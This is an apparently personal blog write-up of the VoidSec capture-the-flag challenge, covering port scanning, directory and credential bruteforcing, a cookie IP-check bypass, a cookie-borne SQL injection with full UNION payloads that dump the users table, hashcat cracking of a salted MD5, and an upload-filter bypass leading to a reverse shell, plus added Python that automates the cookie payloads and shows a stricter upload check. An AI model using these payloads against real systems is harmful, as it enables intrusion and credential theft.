[CTF] VoidSec CTF

I’m sorry for the big delay, but I was full of exams in this period and I didn’t have time to write posts on my blog. Today I want to show you the writeup of an awesome CTF: http://ctf.voidsec.com.

Information Gathering

First of all I launched a scan with nmap:

nmap ctf.voidsec.com -sS -p 1-65535

After some time (a lot of time) I found the open ports:

PORT      STATE    SERVICE 
22/tcp    open     ssh 
54/tcp    filtered xns-ch 
111/tcp   open     rpcbind 
8332/tcp  filtered unknown 
8333/tcp  filtered bitcoin 
9332/tcp  filtered unknown 
9333/tcp  filtered litecoin 
9987/tcp  filtered dsm-scm-target 
51065/tcp open     unknown 
62222/tcp open     unknown 
65324/tcp open     unknown

I tried to browse to http://ctf.voidsec.com:65324 and realized that I had found the HTTP port. I clicked on the big START button, which showed me a popup that said:

Back in my days I used to start with a bit of healthy Information Gathering

Ok, let’s do this information gathering.
First of all I bruteforced directories and files with the dirbuster wordlist directory-list-2.3-medium.txt and found the /backup-recovery folder. Directory listing was enabled, and I downloaded the only file inside it (userlist.bak). I also found the /include folder and, bruteforcing file names there, config.php.bak, which contained a hash salt: 3f42

Finally I took a look at robots.txt and found the admin login portal directory: /eLprZw6c. When I tried to access it I got a 403 error:

Error 403 - Forbidden

This interface is only accessible from: 144.11.32.239

Your IP Address: 79.30.175.53

To bypass this I changed the value of the admin_ip cookie to 144.11.32.239.

Bruteforcing is your friend

I moved to the registration page (http://ctf.voidsec.com:65324/register.php) and noticed that, when choosing a username, the page told me whether it was already taken or not. So I intercepted the request (an AJAX one) with Burp Suite and bruteforced usernames with the .bak file downloaded earlier. In the end only one username existed: sukumar. Then I bruteforced the password from the login form with Burp Suite and found trustno1.

Cookie Injection

Now that I was logged in as sukumar I explored the page. There was a dashboard with a disabled comments section; I tried to enable it, but that was not the right path. Then I found a new cookie, secure_club:

c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdObVFnTmpVPTowOjE0ODY4OTkwNTE%3D

I URL-decoded it and then base64-decoded it and found this:

sukumar:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Then I tested whether the cookie was vulnerable to SQL injection:

sukumar' OR 1=1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I re-encoded it and refreshed the page. The username sukumar in the top-left menu was now replaced by Without pain, so I could exploit the SQLi. First of all I found the number of columns:

sukumar' GROUP BY 1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 2#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 3#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 4#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
sukumar' GROUP BY 6#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Up to GROUP BY 5 the page rendered correctly, but with 6 the username and email were blank, so I concluded the query returns only 5 columns. Next I found which columns were reflected in the page:

s' UNION ALL SELECT 1,2,3,4,5#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

Numbers 2 and 5 were displayed on the page, so I could use those two columns to dump the database:

s' UNION ALL SELECT 1,database(),3,4,user()#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

I got this:

ctf
ctf_user@localhost

Now I found the table names:

s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,table_name,3,4,5 FROM information_schema.tables WHERE table_schema = database() LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

So, the tables are:

comments
users
usersonline

The users table was the one I was interested in, so I enumerated its column names:

s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 0,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 1,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 2,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 3,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051
s' UNION ALL SELECT 1,column_name,3,4,5 FROM information_schema.columns WHERE table_name = 'users' LIMIT 4,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

The columns of table users are:

id
username
type
password
mail

Now dump the admin’s username, password hash and email:

s' UNION ALL SELECT 1,CONCAT(username, '~', password, '~', mail),3,4,5 FROM users LIMIT 9,1#:NzIgNjUgNmQgNjUgNmQgNjIgNjUgNzIgNWYgNmQgNjU=:0:1486899051

This is the output:

tyler~b9e45646f4d582b700c59c0211eedc6c~tylerdurden@mayhem.com
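Here is an added Python example (mine, not code from the original post or from the CTF) that automates the cookie handling used above: it URL- and base64-decodes the secure_club cookie, decodes its second field (base64 over space-separated hex bytes), and re-encodes a cookie with an injected username field. The second half reproduces the GROUP BY column counting, the UNION marker probe and the LIMIT offset,1 row-by-row dump against a constructed SQLite stand-in for the users table. The stand-in query and its rows are assumptions; SQLite has no `#` comment and no CONCAT(), so the local payloads end with `-- ` and use `||`, whereas the MySQL target on the page accepted `#` and CONCAT().

```python
import base64
import sqlite3
from urllib.parse import quote, unquote

# The secure_club cookie exactly as captured on the page (URL-encoded base64).
SECURE_CLUB = ("c3VrdW1hcjpOeklnTmpVZ05tUWdOalVnTm1RZ05qSWdOalVnTnpJZ05XWWdO"
               "bVFnTmpVPTowOjE0ODY4OTkwNTE%3D")


def decode_cookie(value):
    """URL-decode, then base64-decode, then split the four ':'-separated fields."""
    raw = base64.b64decode(unquote(value)).decode()
    return raw.split(":", 3)


def decode_hex_words(field):
    """The second field is base64 over space-separated hex byte values; recover the text."""
    hex_values = base64.b64decode(field).decode().split()
    return bytes(int(h, 16) for h in hex_values).decode()


def build_cookie(username_field, template=SECURE_CLUB):
    """Swap the username field for a payload and re-encode it the way the server expects."""
    fields = decode_cookie(template)
    fields[0] = username_field
    return quote(base64.b64encode(":".join(fields).encode()).decode(), safe="")


# ---- Local stand-in for the vulnerable lookup (constructed data, SQLite) ----
# Assumption: the server did roughly this with the cookie's username field.

def setup_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, type TEXT, "
                "password TEXT, mail TEXT)")
    con.executemany("INSERT INTO users VALUES (?,?,?,?,?)", [
        (1, "Without pain", "user", "aaaa", "first@example.invalid"),  # constructed
        (2, "sukumar", "user", "bbbb", "sukumar@example.invalid"),     # constructed
    ])
    return con


def vulnerable_lookup(con, username_field):
    """String-concatenated query; None stands for the 'blank username/email' page."""
    sql = ("SELECT id,username,type,password,mail FROM users "
           f"WHERE username='{username_field}'")
    try:
        return con.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None


def count_columns(con, max_cols=10):
    """GROUP BY n probing: the last n that still renders is the column count."""
    n = 0
    for i in range(1, max_cols + 1):
        if vulnerable_lookup(con, f"sukumar' GROUP BY {i}-- ") is None:
            break
        n = i
    return n


def union_probe(con, ncols):
    """UNION ALL SELECT 1,2,...,n: the markers that show up are the reflected columns."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    return vulnerable_lookup(con, f"s' UNION ALL SELECT {markers}-- ")


def dump_column(con, expr, table, where="1=1", limit=50):
    """Row-by-row extraction through reflected column 2 using LIMIT offset,1."""
    out = []
    for off in range(limit):
        row = vulnerable_lookup(
            con, f"s' UNION ALL SELECT 1,{expr},3,4,5 FROM {table} "
                 f"WHERE {where} LIMIT {off},1-- ")
        if row is None:
            break
        out.append(row[1])
    return out


if __name__ == "__main__":
    fields = decode_cookie(SECURE_CLUB)
    print(fields, decode_hex_words(fields[1]))
    print(build_cookie("sukumar' OR 1=1#"))   # value to paste into the browser cookie
    con = setup_db()
    print(vulnerable_lookup(con, "sukumar' OR 1=1-- ")[1])
    print(count_columns(con), union_probe(con, 5))
    print(dump_column(con, "name", "sqlite_master", "type='table'"))
    print(dump_column(con, "username||'~'||password||'~'||mail", "users"))
```

Decoding the second cookie field this way gives the string remember_me, which is why the injection only needed to touch the first field. Against the real target you would swap `sqlite_master` for `information_schema.tables` and `||` for CONCAT(), exactly as in the payloads above.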

Ok, now I needed to crack the hash. With hash-identifier I found it could be MD5($salt.$pass), so I created a file with the hash and the salt:

b9e45646f4d582b700c59c0211eedc6c:3f42

Also, clicking on “Forgot your password?” on the admin portal login I found the password rules:

Remember, your new password must:

- start with _
- use only this charset [a-z][A-Z][0-9]
- be max 8 char length

So I performed a mask attack with hashcat (-m 20 is md5($salt.$pass); -1 and -2 define the custom charsets used in the mask):

optirun hashcat -a 3 -m 20 -1 _ -2 ?l?u?d ?1?2?2?2?2?2?2?2 hash.txt

After some minutes hashcat found the password, _Kr4K3n0, which matches the rules above.
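To make the hashcat line concrete, here is an added Python example (mine, not from the original post) that implements what -m 20 and the -a 3 mask mean: the salt is prepended to the candidate before hashing, and a mask such as ?1?2?2 expands, per position, into the charsets given with -1 and -2. The crack function is the same brute force in pure Python and is only practical for short masks; the full 8-character mask from the page is 62^7 candidates and is why you hand it to hashcat. The tiny test hash (md5 of "abc" with salt "a") is constructed for the example.

```python
import hashlib
import itertools
import string

# hashcat built-in charsets referenced by the page's mask
CHARSETS = {
    "?l": string.ascii_lowercase,
    "?u": string.ascii_uppercase,
    "?d": string.digits,
}


def md5_salt_pass(salt, password):
    """hashcat mode 20: md5($salt.$pass), salt first, then the password."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def charset(spec, custom):
    """Expand a charset spec such as '?l?u?d' or '_' into the concrete characters.
    custom maps '?1'..'?4' to their own specs, which may reference the built-ins."""
    out, i = [], 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i:i + 2]
            if key in CHARSETS:
                out.append(CHARSETS[key])
            elif key in custom:
                out.append(charset(custom[key], custom))
            else:
                raise ValueError("unknown charset " + key)
            i += 2
        else:
            out.append(spec[i])  # literal character
            i += 1
    return "".join(out)


def mask_candidates(mask, custom=None):
    """Yield every candidate for a hashcat -a 3 mask made of ?x tokens,
    e.g. '?1?2?2' with custom {'?1': '_', '?2': '?l?u?d'} (assumes no literals in the mask)."""
    custom = custom or {}
    positions = [charset(mask[i:i + 2], custom) for i in range(0, len(mask), 2)]
    for combo in itertools.product(*positions):
        yield "".join(combo)


def crack(target_hash, salt, mask, custom=None):
    """Brute-force md5($salt.$pass) over the mask; returns the password or None."""
    for cand in mask_candidates(mask, custom):
        if md5_salt_pass(salt, cand) == target_hash:
            return cand
    return None


if __name__ == "__main__":
    custom = {"?1": "_", "?2": "?l?u?d"}        # the -1 and -2 options from the page
    print(sum(1 for _ in mask_candidates("?1?2?2", custom)), "candidates for ?1?2?2")
    # Re-check the page's hash, salt and recovered password; prints True if they agree.
    print(md5_salt_pass("3f42", "_Kr4K3n0") == "b9e45646f4d582b700c59c0211eedc6c")
```

The last line is the sanity check worth running after any crack: recompute the hash from the salt and the recovered password in the exact order the mode prescribes, rather than trusting the tool's output line.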

Give me a reverse shell!

Now that I was logged in with the admin credentials I found an upload form in the settings menu at the top-right of the dashboard. It accepts only .xml files, but I tried to upload a PHP shell anyway:

POST /eLprZw6c/upload.php HTTP/1.1
Host: ctf.voidsec.com:65324
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ctf.voidsec.com:65324/eLprZw6c/settings.php
Cookie: __cfduid=df50c6365654161b804e8cbafbfbd1ccc1486652943; __utma=225611421.1379856735.1486652948.1486652948.1486850440.2; __utmz=225611421.1486652948.1.1.utmcsr=ctf.voidsec.com:65324|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; secure_club=cycgVU5JT04gQUxMIFNFTEVDVCAxLENPTkNBVCh1c2VybmFtZSwgJ34nLCBwYXNzd29yZCwgJ34nLCBtYWlsKSwzLDQsNSBGUk9NIHVzZXJzIExJTUlUIDksMSM6TnpJZ05qVWdObVFnTmpVZ05tUWdOaklnTmpVZ056SWdOV1lnTm1RZ05qVT06MDoxNDg2ODk5MDUx; admin_ip=144.11.32.239; PHPSESSID=tqo38cmsghq0q2msd1to1sp115
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------178431310316686449931498616622
Content-Length: 250

-----------------------------178431310316686449931498616622
Content-Disposition: form-data; name="file"; filename="shell.php;.xml"
Content-Type: text/xml



-----------------------------178431310316686449931498616622--

After the upload the “XML” was processed and I got a reverse shell on my box! Then I browsed to /zCTF-END-HERE and read the END.txt file.
CTF completed!
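As an added example (mine, not the CTF's code, whose actual filter is not shown on the page), here is the kind of upload check that the filename shell.php;.xml and the client-declared Content-Type from the request above would satisfy, next to a stricter version that rejects it. The naive check is an assumption about how such filters are commonly written; the strict version allow-lists the entire filename and never stores the client's name on disk.

```python
import re
import secrets

# Filename and declared type taken from the upload request on the page.
UPLOAD_NAME = "shell.php;.xml"
UPLOAD_CTYPE = "text/xml"


def naive_accepts(filename, content_type):
    """Assumed weak filter: name ends in '.xml' and the client says it is XML.
    Both facts are controlled by the uploader, so this request passes."""
    return (filename.lower().endswith(".xml")
            and content_type in ("text/xml", "application/xml"))


# Whole-name allow-list: one safe stem, exactly one extension, no ';', '/', '..', etc.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.xml$")


def strict_accepts(filename):
    """Reject anything that is not a plain stem plus a single .xml extension."""
    return SAFE_NAME.match(filename) is not None


def stored_name():
    """Never keep the client's name on disk: random stem plus the fixed allowed extension."""
    return secrets.token_hex(16) + ".xml"


if __name__ == "__main__":
    print("naive accepts:", naive_accepts(UPLOAD_NAME, UPLOAD_CTYPE))
    print("strict accepts:", strict_accepts(UPLOAD_NAME))
    print("stored as:", stored_name())
```

The name check is only one half of the fix: the upload directory should also be outside the web root (or configured so the web server never executes anything in it), and the body should be parsed as XML by a real parser before it is used, since the declared Content-Type proves nothing.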
